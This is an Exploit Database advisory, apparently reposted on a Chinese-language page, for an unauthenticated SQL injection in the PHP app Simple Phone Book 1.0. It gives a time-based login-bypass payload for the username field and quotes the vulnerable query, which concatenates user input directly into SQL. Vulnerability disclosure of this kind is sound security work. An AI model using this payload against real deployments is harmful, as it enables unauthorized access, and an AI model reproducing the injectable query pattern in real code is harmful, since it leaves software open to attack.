Simple Phone Book 1.0 – ‘Username’ SQL Injection (Unauthenticated)

• Exploit Database
• 16 阅读

• 作者： Justin White
  日期： 2021-08-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50223/

• # Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
  # Date: 21/08/2021
  # Exploit Author: Justin White
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
  # Version: 1.0
  # Testeted on: Linux (Ubuntu 20.04) using LAMPP
  
  ## SQL Injection
  
  # Vulnerable page
  http://localhost/PhoneBook/index.php
  
  # Vulnerable paramater 
  username1 & password
  
  # POC
  Username = ' or sleep(5)='-- -
  Password = ' '
  
  Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"
  
  # Vulnerable Code
  index.php line 13
  $sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");